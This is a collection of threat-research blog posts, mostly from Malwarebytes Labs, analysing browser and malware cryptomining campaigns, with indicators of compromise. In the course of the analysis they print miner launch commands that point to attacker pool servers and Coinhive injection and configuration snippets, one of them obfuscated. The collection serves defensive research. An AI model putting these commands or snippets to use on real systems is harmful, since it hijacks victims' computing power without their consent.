Obfuscated Coinhive shortlink reveals larger mining operation

During the past several months, in-browser mining has continued to affect a large number of websites, predominantly relying on Coinhive’s infamous API. We documented several campaigns on this blog, in particular Drupalgeddon, where attackers are taking advantage of vulnerabilities in popular Content Management Systems (CMS) to compromise websites and push payloads both client- and server-side.

In the past weeks, our crawlers have catalogued several hundred sites using a variety of CMS all injected with the same obfuscated code that uses Coinhive’s shortlink to perform silent drive-by mining. By pivoting on this indicator of compromise, we were able to identify a larger infrastructure receiving traffic from several thousand hacked sites acting as doorways to redirect traffic to a central server involved in the distribution of both web and standard malware coin miners.

Figure 1: Mining operation fueled by compromised sites

Obfuscated miner injection

As part of our regular crawls, we look for known redirects to sites of interest and lately, most have been related to Coinhive domains. We detected hundreds of new domains, all legitimate websites that were injected with a blurb of hexadecimal code. Once decoded, it shows as an invisible iframe (1×1 pixel) to cnhv[.]co/3h2b2. We believe it is part of the same campaign that was exposed by the folks over at Sucuri at the end of May.

</i frame>

Figure 2: A WordPress site injected with an obfuscated iframe loading Coinhive’s API

The cnhv[.]co domain name is used for what Coinhive calls shortlinks, essentially a way of monetizing on hyperlinks by making visitors’ browsers solve a certain number of hashes before they reach their destination site. When clicking on such a link, you will see a progress bar and within a few seconds, you will be redirected. Crooks are abusing this feature by loading those shortlinks as hidden iframes with an unreasonably high hash count.

Figure 3: Shortlink is taxing our CPU at 100% 

In Figure 3 where we made the iframe visible by by changing its dimensions, to show that rather than wait for a few seconds before being redirected, users will unknowingly be mining for as long as they stay on the page. Indeed, while Coinhive’s default setting is set to 1024 hashes, this one requires 3,712,000 before loading the destination URL.

Backdoor initiated redirection

Querying urlscan.io, we were able to find the same Coinhive key active as early as May 7 via a different redirection mechanism. There is a specific URI pattern indicating that hacked sites are being leveraged to perform a redirect to a server at 5.45.79[.]15. This in turn creates a redirection via another crafted URI where one of the parameters is the referrer site, ultimately leading to the Coinhive shortlink that will start the web miner.

Figure 4: The same shortlink was found loaded from a compromised website via an intermediary server

Several sites have been injected with both the hidden cnvh[.]co iframe method, as well as via backdoors:

Figure 5: A hacked site injected with Coinhive’s shortlink and multiple compromised URLs

The URI pattern used for the redirections can be identified by the following regular expression:

Figure 6: A regular expression showing a match between compromised sites

Blackhat SEO and doorways

Looking at those URIs again, we can note the presence of certain keywords that appear to be Search Engine Optimization (SEO) related, for instance:


We confirmed that indeed some Google or Bing searches showed us results that included the list of compromised sites that are acting as “doorways,” usually to a traffic distribution system or redirector (5.45.79[.]15). In this case, the doorways are used to trick people into downloading malicious coin miners instead of the file they were looking for.

Figure 7: Despite appearances, this file is not 100 percent clean

Note how the server at 5.45.79[.]15 is performing the redirection to another hacked sited (motoir[.]com), where the keywords passed from the URI are dynamically used to create what looks like a unique download page and file.

Figure 8: Web traffic showing the redirection sequence

Malicious coin miners

Upon execution, this executable will unpack the following three binaries:

  1. winsystem.exe: the XMRig miner
  2. clock.exe: .bat file wrapped into an EXE contains commands
  3. netflash.exe: a very simple downloader, written in .NET.

The batch script adds persistence by setting a registry entry, kills certain processes (possible miners already running), and starts mining by launching:

winsystem.exe -B -a cryptonight -o 37.1.197[.]121:80 -p x -u %COMPUTERNAME% +500 --max-cpu-usage=30 --donate-level=1 -k

Figure 9: Batch script revealing the mining code

The fake download binaries are based on the same code from a miner, unsurprisingly, hosted at 5.45.79[.]15/xxxphoto.exe. Using VirusTotal Intelligence, we were able to expand on this infrastructure and identify another coin miner, which is an ELF file this time, based on this cnrig library, hosted at: 5.45.79[.]15/monero/cnrig.

Figure 10: Graph showing an ELF and Win32 miner hosted on the same server

A comment left on this VirusTotal report page indicates that this miner was found on an infected server and pulled down from a PHP backdoor called zz1.php. Searching for that file name, we located a possible candidate uploaded to a public site. Decoding the Base64 encoded strings, we can assert with greater confidence that this is the malicious PHP file used by the attackers to download the Linux coin miner from 5.45.79[.]15/monero/cnrig:

Figure 11: PHP code uploaded into compromised sites responsible for ELF miner download

Once it has retrieved the ELF binary, it runs it, using the following command in order to begin mining:

./cnrig -o 5.61.46[.]146:80 --donate-level=1 > /dev/null 2>&1


Because the miners are connecting to private pools (and likely via proxy) without using a wallet address, we cannot assess how much money the perpetrators have generated with this scheme.

In fact, the server at 5.45.79[.]15 also has its own ProxyPanel:

Figure 12: A proxy based on xmrig-proxy

The XMRig version of the miner had a public stats page indicating that there were close to 500 infected machines that had participated in the mining activity. For the CNRig version, we weren’t able to find any such stat, although the number of hacked servers was much higher.

A growing number of sites

The interest surrounding cryptocurrencies has drastically changed the malware landscape with criminals hoping to get a piece of the action. As such, a growing number of websites are being compromised both client- and server-side to distribute and run coin miners.

In this campaign, we see infrastructure used to push an XMRig miner onto users by tricking them into downloading files they were searching for online. In the meantime, hacked servers are instructed to download and run a Linux miner, generating profits for the perpetrators but incurring costs for their owners. Finally, it seems only fitting to see an abuse of Coinhive’s shortlinks to perform in-browser mining.

Malwarebytes blocks malicious mining, whether it is triggered by malware or loaded via compromised websites.

Thanks to @DynamicAnalysis for sharing additional information.

Indicators of compromise

String for obfuscated cnvh[.]co injection


Coinhive shortlink


Coinhive site key


Regex for compromised sites redirection


Redirection server


Windows miner dropper


Linux miner


The post Obfuscated Coinhive shortlink reveals larger mining operation appeared first on Malwarebytes Labs.

Go to Source
Author: Jérôme Segura

Drive-by download campaign targets Chinese websites, experiments with exploits

During our web crawls we sometimes come across bizarre findings or patterns we haven’t seen before. This was the case with a particular drive-by download attack planted on Chinese websites. While by no means advanced (it turned out to be fairly buggy), we witnessed a threat actor experimenting with several different exploits to drop malware.

For years we have cataloged thousands of Chinese websites injected with the same malicious and rudimentary VBScript code. Even to this day, you can find a countless number of sites that have been (or still are) compromised with that pattern, and most of them happen to be hosted in China.

The campaign we stumbled upon starts with sites that were compromised to load external content via scripts and iframe overlays. Although the browser’s address bar shows gusto-delivery[.]com, there are several injected layers that expose visitors to unwanted code and malware.

For instance, we find a reference to a Coinhive clone:

var miner = new ProjectPoi.User('LUdKfdXyeXp9sQZf1pphGOrY', 'john-doe', {
 threads: navigator.hardwareConcurrency,
 autoThreads: false,
 throttle: 0.2,
 forceASMJS: false

We are unsure whether this is a pure ripoff (the website template is almost identical), but one is different from the other in that the Chinese version (hosted at ppoi[.]org) only takes a 10 percent commission as opposed to 30 percent for Coinhive.


I.e. you get 90% of the average XMR we earn. Unlike a traditional mining pool, this
rate is fixed, regardless of actual blocks found and the luck involved finding them. 
We keep 10% for us to operate this service and to (hopefully) turn a profit.

Finally, the most interesting aspect here is the redirection to a server hosting a few exploits as described in the diagram below:

On top of a late addition of the aforementioned VBScript similar to the ones found on other Chinese websites, we notice the inclusion of 3 exploits targeting older vulnerabilities in an ActiveX component, the Flash Player and Internet Explorer.


This old CVE is a vulnerability with the C6 Messenger ActiveX control. The threat actor reused the same code already published here and simply altered the DownloadUrl to point to their malicious binary. Users (unless their browser settings have been changed) will be presented with a prompt asking them to install this piece of malware.


This is a Flash Player vulnerability affecting Flash up to version, which was again lifted from a proof of concept. Its implementation in this particular drive-by is somewhat unstable though and may cause the browser to crash.


Finally a more interesting CVE, the well-known Internet Explorer God Mode, although for some unexplained reason, the code was commented out.

The final payload dropped in this campaign is a DDoS bot, which we will cover in another blog post.


Although we see the use of several exploits, we cannot call this an exploit kit—not even an amateur one. Indeed, the domain serving the exploits appears to be static and the URIs are always the same.

Regardless, it does not prevent threat actors from arranging drive-by attacks by copying and pasting various pieces of code they can find here and there. While not very effective, they may still be able to compromise some legacy systems or machines that have not been patched.

Indicators of compromise

Malicious redirection


Exploit domain and IP








The post Drive-by download campaign targets Chinese websites, experiments with exploits appeared first on Malwarebytes Labs.

Go to Source
Author: Jérôme Segura

Drive-by cryptomining campaign targets millions of Android users

Malvertising and online fraud through forced redirects and Trojanized apps—to cite the two most common examples—are increasingly plaguing Android users. In many cases, this is made worse by the fact that people often don’t use web filtering or security applications on their mobile devices.

A particular group is seizing this opportunity to deliver one of the most lucrative payloads at the moment: drive-by cryptomining for the Monero (XMR) currency. In a campaign we first observed in late January, but which appears to have started at least around November 2017, millions of mobile users (we believe Android devices are targeted) have been redirected to a specifically designed page performing in-browser cryptomining.

In our previous research on drive-by mining, we defined this technique as automated, without user consent, and mostly silent (apart from the noise coming out of the victim’s computer fan when their CPU is clocked at 100 percent). Here, however, visitors are presented with a CAPTCHA to solve in order to prove that they aren’t bots, but rather real humans.

“Your device is showing suspicious surfing behaviour. Please prove that you are human by solving the captcha.”

Until the code (w3FaSO5R) is entered and you press the Continue button, your phone or tablet will be mining Monero at full speed, maxing out the device’s processor.

Redirection mechanism

The discovery came while we were investigating a separate malware campaign dubbed EITest in late January. We were testing various malvertising chains that often lead to tech support scams with an Internet Explorer or Chrome user-agent on Windows. However, when we switched to an Android, we were redirected via a series of hops to that cryptomining page.

It seems odd that a static code (which is also hardcoded in the page’s source) would efficiently validate traffic between human and bot. Similarly, upon clicking the Continue button, users are redirected to the Google home page, another odd choice for having proved you were not a robot.

While Android users may be redirected from regular browsing, we believe that infected apps containing ad modules are loading similar chains leading to this cryptomining page. This is unfortunately common in the Android ecosystem, especially with so-called “free” apps.

It’s possible that this particular campaign is going after low quality traffic—but not necessarily bots —and rather than serving typical ads that might be wasted, they chose to make a profit using a browser-based Monero miner.

We identified several identical domains all using the same CAPTCHA code, and yet having different Coinhive site keys (see our indicators of compromise for the full details). The first one was registered in late November 2017, and new domains have been created since then, always with the same template.

Domain name, registration date

Traffic stats

We believe there are several more domains than just the few that we caught, but even this small subset is enough to give us an idea of the scope behind this campaign. We shared two of the most active sites with ad fraud researcher Dr. Augustine Fou, who ran some stats via the SimilarWeb web analytics service. This confirmed our suspicions that the majority of traffic came via mobile and spiked in January.

We estimate that the traffic combined from the five domains we identified so far equals to about 800,000 visits per day, with an average time of four minutes spent on the mining page. To find out the number of hashes that would be produced, we could take a conservative hash rate of 10 h/s based on a benchmark of ARM processors.

It is difficult to determine how much Monero currency this operation is currently yielding without knowing how many other domains (and therefore total traffic) are out there. Because of the low hash rate and the limited time spent mining, we estimate this scheme is probably only netting a few thousand dollars each month. However, as cryptocurrencies continue to gain value, this amount could easily be multiplied a few times over.


The threat landscape has changed dramatically over the past few months, with many actors jumping on the cryptocurrency bandwagon. Malware-based miners, as well as their web-based counterparts, are booming and offering online criminals new revenue sources.

Forced cryptomining is now also affecting mobile phones and tablets en masse—not only via Trojanized apps, but also via redirects and pop-unders. We strongly advise users to run the same security tools they have on their PC on their mobile devices, because unwanted cryptomining is not only a nuisance but can also cause permanent damage.

Malwarebytes mobile users are protected against this threat.

Indicators of compromise



Referring websites (please note that they should not be necessarily considered malicious):


Conhive site keys:


The post Drive-by cryptomining campaign targets millions of Android users appeared first on Malwarebytes Labs.

Go to Source
Author: Jérôme Segura

Bank robbers 2.0: digital thievery and stolen cryptocoins

Imagine running down the street (and away from law enforcement) with 2,000 pounds of gold bars. Or 1,450 pounds in $100 bills. With both of these physical currencies amounting to roughly US$64 million, you’d be making quite a steal…if you could get away with it.

That’s exactly what the next generation of thieves—bank robbers 2.0—did in December 2017, when they stole more than $60 million in Bitcoin* from the mining marketplace NiceHash. It turns out stealing Bitcoin is a lot less taxing on the body.

*Disclaimer: I used the value of Bitcoins as they were at the time of the robbery. Current values are volatile and change from minute to minute.

Crime these days has gotten a technical upgrade. By going digital, crooks are better able to pull off high-stakes sting operations, using the anonymity of the Internet as their weapon of choice. And their target? Cryptocurrency.

Old-school bank robbers

The amount of money stolen from NiceHash is comparable to arguably the biggest physical heist to date, the theft of nearly $70 million from a Brazilian bank in 2005. Noted in the Guinness Book of World Records, the robbers managed to get away with 7,716 pounds of 50 Brazilian real notes. There were 25 people involved—including experts in mathematics, engineering, and excavation—who fronted a landscaping company near the bank, dug a 78-meter (256-foot) tunnel underneath it, and broke through 1 meter (about 3.5 feet) of steel-reinforced concrete to enter the bank vault.

The largest bank robbery in the United States, meanwhile, was at the United California Bank in 1972. The details of this bank robbery were described by its mastermind, Amil Dinsio, in the book Inside the Vault. A gang of seven, including an alarm expert, explosives expert, and burglary tool designer, broke into the bank’s safe deposit vault and made off with cash and valuables with an estimated value of $30 million US dollars.

What these robberies have in common is that, in order to pull them off, there were large groups of criminals involved with various special skills. Most of the criminals of these robberies were either caught or betrayed—physical theft leaves physical traces behind. Today’s physical robbers run the risk of getting hurt or hurting others, or leaving behind prints or DNA. And they are often tasked with moving large amounts of money or merchandise without being seen.

heavy loot

Bank robbers 2.0

So here comes the bank robbers 2.0. They don’t have to worry about transporting stolen goods, fleeing the crime scene, digging or blowing things up. They are in no—immediate—physical danger. And if they’re smart enough, they work alone or remain anonymous, even to their accessories. Their digital thievery has been proven successful through several methods used to obfuscate their identity, location, and criminal master plan.

Social engineering

One of the most spectacular digital crimes targeted 100 banks and financial institutions in 30 nations with a months-long prolonged attack in 2013, reportedly netting the criminals involved over $300 million. The group responsible for this used social engineering to install malicious programs on bank employees’ systems.

The robbers were looking for employees responsible for bank transfers or ATM remote control. By doing so, they were able to mimic the actions required to transfer money to accounts they controlled without alerting the bank that anything unusual was going on. For example, they were able to show more money on a balance than was actually in the account. An account with $10,000 could be altered to show $100,000 so that hackers could transfer $90,000 to their own accounts without anyone noticing anything.

The alleged group behind this attack, the Carbanak Group, have not yet been apprehended, and variants of their malware are still active in the wild.

Ponzi schemes

Bitcoin Savings & Trust (BST), a large Bitcoin investment firm that was later proved to be a pyramid scheme, offered 7 percent interest per week to investors who parked their Bitcoins there. When the virtual hedge fund shut down in 2012, most of its investors were not refunded. At the time of its closing, BST was sitting on 500,000 BTC, worth an estimated $5.6 million. Its founder, an e-currency banker who went by the pseudonym pirateat40, only paid back a small sum to some beneficiaries before going into default. It was later learned that he misappropriated nearly $150,000 of his clients’ money on “rent, car-related expenses, utilities, retail purchases, casinos, and meals.”


Even though details are still unclear, the NiceHash hack was reported as a security breach related to the website of the popular mining marketplace. Roughly 4,732 coins were transferred away from internal NiceHash Bitcoin addresses to a single Bitcoin address controlled by an unknown party. The hackers appear to have entered the NiceHash system using the credentials of one of the company’s engineers. As it stands now, it is unknown how they acquired those, although it’s whispered to be an inside job.

Stolen wallet keys

In September 2011, the MtGox hot wallet private keys were stolen in a case of a simple copied wallet.dat file. This gave the hacker access to not only a sizable number of Bitcoins immediately, but also the ability to redirect the incoming trickle of Bitcoins deposited to any of the addresses contained in the file. This went on for a few years until the theft was discovered in 2014. The damages by then were estimated at $450 million. A suspect was arrested in 2017.

Transaction malleability

When a Bitcoin transaction is made, the account sending the money digitally signs the important information, including the amount of Bitcoin being sent, who it’s coming from, and where it’s going. A transaction ID, a unique name for that transaction, is then generated from that information. But some of the data used to generate the transaction ID comes from the unsigned, insecure part of the transaction.As a result, it’s possible to alter the transaction ID without needing the sender’s permission. This vulnerability in the Bitcoin protocol became known as “transaction malleability.”

Transaction malleability was a hot topic in 2014, as researchers saw how easily criminals could exploit it. For example, a thief could claim that his transactions didn’t show up under the expected ID (because he had edited it), and complain that the transaction had failed. The system would then automatically retry, initiating a second transaction and sending out more Bitcoins.

Silk Road 2.0 blamed this bug for the theft of $2.6 million in Bitcoins in 2014, but it was never proven to be true.

Man-in-the-middle (by design)

In 2018, a Tor proxy was found stealing Bitcoin from both ransomware authors and victims alike. A Tor proxy service is a website that allows users to access .onion domains hosted on the Tor network without having to install the Tor browser. As Tor proxy servers have a man-in-the-middle (MitM) function by design, the thieves were able to replace the Bitcoin address that victims were paying ransom to and insert their own. This left the ransomware authors unpaid, which in turn left the victims without their decryption key.


Also known as drive-by mining, cryptojacking is a next-generation, stealthy robbing trick that covers all mining activities completed on third-party systems without the users’ consent. Stealing little amounts from many can amount to large sums. There are so many methods to achieve this that Malwarebytes’ own Jérôme Segura published a whitepaper about it.

Unlike drive-by downloads that push malware, drive-by mining focuses on utilizing the processing power of visitors’ computers to mine cryptocurrency, especially those that were designed to accommodate non-specialized processors. Miners of this kind come to us in advertisements, bundlers, browser extensions, and Trojans. The revenues are hard to guess, but given the number of blocks Malwarebytes records on Coinhive and similar sites daily, criminal profit margins could be potentially record-breaking.

Physical stealing of digital currency

This last one brings us full circle, as someone actually managed to steal Bitcoins the old-fashioned way. In January 2018, three armed men attempted to rob a Bitcoin exchange in Canada, but failed miserably as a hidden employee managed to call the police. However, others have had more success. The Manhattan District attorney is looking for the accomplice of a man that robbed his friend of $1.8 million in Ether at gunpoint. Apparently this “friend” got hold of the physical wallet and forced the victim to surrender the key needed to transfer the cryptocurrency into his own account.


As we can conclude from the examples above, there are many ways for cybercriminals to get rich quick. With a lot less risk of physical harm and even less hard labor, they can score larger amounts for less risk than the old-fashioned bank robbers. The only pitfall to robbing digital currency is how to turn it into fiat money without raising a lot of suspicion or losing a big chunk to launderers.

While the diminished use of violence is reassuring, it’s still beneficial to think about how we can avoid becoming a victim. Much of it has to do with putting too much trust in the wrong people. We are dealing with a very young industry that doesn’t have a lot of established names. So how can you avoid getting hurt by these modern thieves? Here are a few tips:

  • Don’t put all your eggs in one basket.
  • Use common sense when deciding who to do business with. A little background check into the company and its execs never hurt anyone.
  • Don’t put more money into cryptocurrencies than you can spare.

Additional links

The post Bank robbers 2.0: digital thievery and stolen cryptocoins appeared first on Malwarebytes Labs.

Go to Source
Author: Pieter Arntz

Persistent drive-by cryptomining coming to a browser near you

Since our last blog on drive-by cryptomining, we are witnessing more and more cases of abuse involving the infamous Coinhive service that allows websites to use their visitors to mine the Monero cryptocurrency. Servers continue to get hacked with mining code, and plugins get hijacked and affect hundreds or even thousands of sites at once.

One of the major drawbacks of web-based cryptomining we mentioned in our paper was its ephemeral nature compared to persistent malware that can run a miner for as long as the computer remains infected. Indeed, when users close their browser, the cryptomining activity will also stop, thereby cutting out the perpetrators’ profit.

However, we have come across a technique that allows dubious website owners or attackers that have compromised sites to keep mining for Monero even after the browser window is closed. Our tests were conducted using the latest version of the Google Chrome browser. Results may vary with other browsers. What we observed was the following:

  • A user visits a website, which silently loads cryptomining code.
  • CPU activity rises but is not maxed out.
  • The user leaves the site and closes the Chrome window.
  • CPU activity remains higher than normal as cryptomining continues.

The trick is that although the visible browser windows are closed, there is a hidden one that remains opened. This is due to a pop-under which is sized to fit right under the taskbar and hides behind the clock. The hidden window’s coordinates will vary based on each user’s screen resolution, but follow this rule:

  • Horizontal position = ( current screen x resolution ) – 100
  • Vertical position = ( current screen y resolution ) – 40

If your Windows theme allows for taskbar transparency, you can catch a glimpse of the rogue window. Otherwise, to expose it you can simply resize the taskbar and it will magically pop it back up:

A look under the hood

This particular event was caught on an adult site that was already using aggressive advertising tricks. Looking at the network traffic, we can see where the rogue browser window came from and what it loaded.

The pop-under window (elthamely[.]com) is launched by the Ad Maven ad network (see previous post about bypassing adblockers), which in turn loads resources from Amazon (cloudfront[.]net). This is not the first cryptominer being hosted on AWS, but this one does things a little bit differently by retrieving a payload from yet another domain (hatevery.info).

We notice some functions that come straight from the Coinhive documentation, such as .hasWASMSupport(), which checks whether the browser supports WebAssembly, a newer format that allows users to take full advantage of the hardware’s capability directly from the browser. If it doesn’t, it would revert to the slower JavaScript version (asm.js).

The WebAssembly module (.wasm) is downloaded from hatevery[.]info and contains references to cryptonight, the API used to mine Monero. As mentioned above, the mining is being throttled to have a moderate impact on users’ machines so that it stays under the radar.


This type of pop-under is designed to bypass adblockers and is a lot harder to identify because of how cleverly it hides itself. Closing the browser using the “X” is no longer sufficient. The more technical users will want to run Task Manager to ensure there is no remnant running browser processes and terminate them. Alternatively, the taskbar will still show the browser’s icon with slight highlighting, indicating that it is still running.

More abuse on the horizon

Nearly two months since Coinhive’s inception, browser-based cryptomining remains highly popular, but for all the wrong reasons. Forced mining (no opt-in) is a bad practice, and any tricks like the one detailed in this blog are only going to erode any confidence some might have had in mining as an ad replacement. History shows us that trying to get rid of ads failed before, but only time will tell if this will be any different.

Unscrupulous website owners and miscreants alike will no doubt continue to seek ways to deliver drive-by mining, and users will try to fight back by downloading more adblockers, extensions, and other tools to protect themselves. If malvertising wasn’t bad enough as is, now it has a new weapon that works on all platforms and browsers.

Indicators of compromise,yourporn[.]sexy,Adult site,elthamely[.]com,Ad Maven popunder,d3iz6lralvg77g[.]cloudfront.net,Advertiser's launchpad,hatevery[.]info,Cryptomining site

Cryptonight WebAssembly module:


The post Persistent drive-by cryptomining coming to a browser near you appeared first on Malwarebytes Labs.

Go to Source
Author: Jérôme Segura

A look into the global drive-by cryptocurrency mining phenomenon

An important milestone in the history of cryptomining happened around mid-September when a company called Coinhive launched a service that could mine for a digital currency known as Monero directly within a web browser.

JavaScript-based mining is cross-platform compatible and works on all modern browsers. Indeed, just about anybody visiting a particular website can start mining for digital currency with eventual profits going to the owner’s wallet (in the best case scenario). In itself, browser-based cryptomining is not illegal and could be seen as a viable business model to replace traditional ad banners.

To differentiate browser-based mining from other forms of mining, many started to label these instances as JavaScript miners or browser miners. The simplicity of the Coinhive API integration was one of the reasons for its immediate success, but due to several oversights, the technology was almost instantly abused.

However, many web portals started to run the Coinhive API in non-throttled mode, resulting in cases of cryptojacking—utilizing 100 percent of the victims’ CPU to mine for cryptocurrency with no knowledge or consent given by the user.

We decided to call this new phenomenon drive-by mining, due to the way the code is delivered onto unsuspecting users, very much like drive-by downloads. There’s one important caveat, though: There is no malware infection at the end of the chain.

While the harm may seem minimal, this is not the kind of web experience most people would sign up for. To make matters worse, one does not always know if they are mining for the website owner or for criminal gangs that have found a new monetization tool for the hacked sites they control.

In our full reportA look into the global drive-by cryptocurrency mining phenomenon, we review the events that led to this new technology being abused and explore where users involved in cryptomining against their will are located.

To give you an idea of the scope of drive-by mining, Malwarebytes has been blocking the original Coinhive API and related proxies an average of 8 million times per day, which added up to approximately 248 million blocks in a single month.

With their new mandatory opt-in API, Coinhive hopes to restore some legitimacy to the technology and, more importantly, push it as a legal means for site owners to earn revenues without having to worry about ad blockers or blacklists. This could also benefit users who might not mind trading some CPU resources for an ad-free online experience.

Time will tell how criminals react, but in the meantime, drive-by mining continues unabated.

For more information on this latest trend in the cryptocurrency world, please download our report.

The post A look into the global drive-by cryptocurrency mining phenomenon appeared first on Malwarebytes Labs.

Go to Source
Author: Jérôme Segura

Unauthorized Coin Mining in the Browser

Cryptocurrencies have taken the world by storm, from the biggest player Bitcoin to newcomers such as Monero and Ethereum. Cryptocurrency mining has thus become a hot industry, from powerful, dedicated mining hardware to exploiting graphics card’s parallel computing power. Recently, browser coin mining has taken off, for a lot of different reasons. Although the computing power (per instance) is much less than dedicated hardware, being able to exploit many users on various sites more than make up for it. There are already quite some media coverage on them, such as BBC, and malwarebytes. While we do not consider crypto-currency mining inside browsers malicious by itself, it is often time that such mining is going on without the end user’s consent or even knowledge that makes this practice shady and despicable.

Coinhive, one of the more popular browser-mining services out there offers site owners a piece of JavaScript for easy integration. Site owners exploit site visitor’s CPU time to mine XMRs (Moneros) for Coinhive, and Coinhive pays out 70% of mined value to site owners. A new player, crypto-loot  emerged recently which offers similar services but pays out 88% of revenue.

Coinhive Integration

On the official Coinhive homepage, we found detailed documentation on how to integrate the mining scripts onto any given website. Owners can use the easy version:

var miner = new CoinHive.Anonymous('YOUR_SITE_KEY');

or more complicated version that gives control over how the end user’s CPU time should be used, e.g. how many threads, should the mining throttle.

var miner = new CoinHive.User('YOUR_SITE_KEY', 'john-doe', {
    threads: 4,
    autoThreads: false,
    throttle: 0.8,
    forceASMJS: false

Higher thread number and/or lower throttle number will result in more CPU usage in client’s browser. With higher CPU occupation percentage, end users will likely experience sluggish behavior and poor experience on the websites.

Tracking Coinhive Integrations

We have been tracking the inclusion of Coinhive mining script (coinhive.min.js) for a week, in our PANDB unknown feed. The number of URLs leading to the download of such similar scripts is astounding. Since we started tracking, we have seen anywhere from 6K unique URLs to over 10K in one single day.

Overall, we have seen over 35,119 unique URLs associated with coinhive.min.js. Across these URLs, there are a total of 144 IPs and 1,025 hostnames. Based on our observation, the appearance of these scripts can be clearly divided into three categories – standalone, voluntary, and compromised.

Standalone Hosting

URLs like this one,


always belong to a jibberish[.]bid domain, with a long trailing set of parameters. Of the 35,119 URLs we collected, 33,188, or 94.5% are of this category. In addition, there are 612 URLs leading to the same set of .bid domains, but with much shorter URLs, like hxxp://www.pudptxanhspld[.]bid/static/robots.txt, or even the domain itself: hxxp://www.pudptxanhspld[.]bid/. The fact that robots.txt is hosting the exact same content as any other longer URLs with seemingly random parameters leads us to speculate that the domain will serve the same coin-mining content to all visitors, ignoring the request parameters or paths. It is interesting to speculate, why did our customer visit such weird, long, random URLs in the first place? We give some of our speculations later in this blog.

After removing the .bid ones, we are left with 1,342 URLs, or 3.8% of the corpus. The remaining can be further categorized into the following three groups:

Voluntary: Crypto-mining related sites

We found multiple URLs related to coin/crypto/mining keywords. Some of these are forums discussing crypto-mining, while others are introducing the concept. Regardless of the purpose of the websites, we did not find any evidence that such sites are asking user’s consent to mine XMRs.

Voluntary: Monetization

This category includes sites that obviously want to include coin-mining scripts to monetize. Examples of these include video/porn sites such as


While they do provide their normal service to the visitors, browsing these sites do not pop up any sort of warning of coin-mining behavior for the user.

What is more interesting is, that by searching across the whole URL corpus for coinhive.min.js downloads, we are able to find URLs such as


which includes xmoviesforyou[.]com as part of the URL, almost like a referer parameter. We are able to verify that


is indeed a valid URL leading to a subpage in the porn site. That site does include coinhive.min.js, but at the time of our re-confirmation, the inclusion is directly from https://coinhive[.]com/lib/coinhive.min[.]js, and the whole page does not include any references to a suspicious .bid domain/URL. We speculate that the porn website URL may have included an iframe leading to the .bid domain, which then triggers the download of coinhive.min.js. However, this mechanism may have been later abandoned in favor of direct inclusion.

Compromised/Injected Integration

Another group of sites seem to have fallen victims of malicious script injection into their vulnerable servers. We found that www.livetruemoney[.]com uses up 100% of user’s CPU time. Upon closer investigation, we found that this site is hosting multiple copies of coinhive.min.js, toward the top and bottom of the page. Similar situation happens in www.comptesofficiels[.]com/, where the snippet is injected outside oftag (a common symptom for injected content).

It is quite possible that crypto-mining has become a new injection vector in addition to traditional exploit kits redirections.

Finally, we have also seen some typo-squatting/phishing domains serving coinhive.min.js. Examples include analytics-google[.]net/track.php, and www-bank[.]ru.

Actor/Mining Configuration Analysis

According to our observation, coin mining integration scripts are rarely obfuscated, which means we can extract the anonymous ‘site key’ and their configurations easily. Per Coinhive’s documentation, the ‘site key’ is a unique identifier to indicate which beneficiary will be paid, therefore, the attacker has no incentive to garble this field. Here are some interesting stats about the actors and their configurations.

Actor distribution


There is a clear winner at the top – ID t3z562mp2zg1lia7rujy19d67woezmjj claiming 35,742 over 36,842 of all the IDs we were able to retrieve. Surprisingly, querying a website source code search engine like publicWWW only returns 13 results (mostly .bid domains). The remote second and third scored 370 and 119 occurrences respectively, along with 8 other IDs topping 10 occurrences. A long tail (146) of IDs only have 1 appearance in our dataset, and these are possibly category 2 or 3 in our integration scenarios described above – mining would benefit themselves rather than a campaign owner.

With no surprise, site key owner t3z562mp2zg1lia7rujy19d67woezmjj has all the .bid URLs pointing to this payee. In addition, there are URLs such as


also using the same site key. Passive DNS analysis reveals that this IP actually was mapped to serve.popads[.]net, so it is interesting that this particular advertising network may have led to crypto-mining behavior.

In this chart, a special case sitekey stands out. There are 151 sites using it, and it is a predefined variable in previous scripts (as opposed to hardcoded string) so without dynamic analysis we are not able to retrieve its real content. We took a look at a few samples and it seems that sites using the sitekey variable are more often than not serving mining script to benefit themselves.

We found only six out of the entire URL population making more than one call to coinhive.Anonymous function (which means they could possibly be compromised by two different adversaries/serving two different payees at the same time). Upon closer inspection, all the calls actually have the same site key, so in summary we did not find evidence of one site serving more than one beneficiary. We did, however, find out that one site, lottoipros[.]com, is attempting to obfuscate its site key by using simple Unicode encoding:

var _0x8cfd=["x56x63x33x38x75x32x33x35x51x67x31x55x6Ex48x78x47x43x52x6Ax59x51x4Dx58x70x6Ex4Ax73x58x77x4Bx4Cx69","x73x74x61x72x74"];var miner=new CoinHive.Anonymous(_0x8cfd[0],{threads:1,autoThreads:true,throttle:0.6,forceASMJS:false})

Clearly, the site owner/injector is aware of the risks of exposing its key and is trying to hide from public scrutiny. If this trend continues, it will become harder to use static analysis to detect crypto-mining sites.

Configuration Distribution

The dominant Actor ID t3z562mp2zg1lia7rujy19d67woezmjj uses default configuration across all of observed URLs, so we exclude this actor from this analysis to prevent skew. We also exclude the 142 sites that use mineropts that go almost hand-in-hand with sites using sitekey as their site key.

This left us with 827 valid data points. Among these, most sites only use 1 thread, by default; however, some sites use as many as 4 threads to maximize mining speed.

Thread count Number of sites
default (1) 772
1 28
2 7
3 1
4 19

For throttling, other than the default setting which disables throttling, the most popular option is to set it at 0.5, so that the CPU would idle 50% of the time. It is sufficient to say that most sites are not giving user’s CPU any break at all by disabling throttling.

Throttle setting Number of sites
default (0) 772
0.5 28
0.2 25
0.7 19
0.9 10
other values combined 35

Hosting domain analysis

In this section, we show some hosting domain stats, including PassiveDNS and Whois data analysis.

The TLD distribution for domains hosting coinhive.min.js is shown below. For brevity, we aggregated all TLDs having less than 20 entries into others category.


Clearly, the top suspects are .download and .bid domains, taking more than 35% of the total share of 1,025 domains. As expected, typically notorious TLDs like .xyz and .win is also listed.

Alexa rank distribution

We checked all associated domains against the current Alexa traffic ranking. The results are astonishing – there are 5 sites in top 2K, 29 sites in top 10K and 155 sites in top 1 million. We sample a few highest-ranking sites and show it here:

Site Alexa Rank
uptobox[.]com 771
123movies[.]co 963
cinecalidad[.]to 1026
watchfree[.]to 1892
sugklonistiko[.]gr 1910

At the time of the writing, we can no longer observe coinhive.min.js on their sites.

The highest ranked .bid domain, llxyyocfgfg[.]bid is ranked at 3380 at the time of this writing. We have attached all these IOCs and their rankings at the end of this blog for the community’s benefits.

pDNS analysis

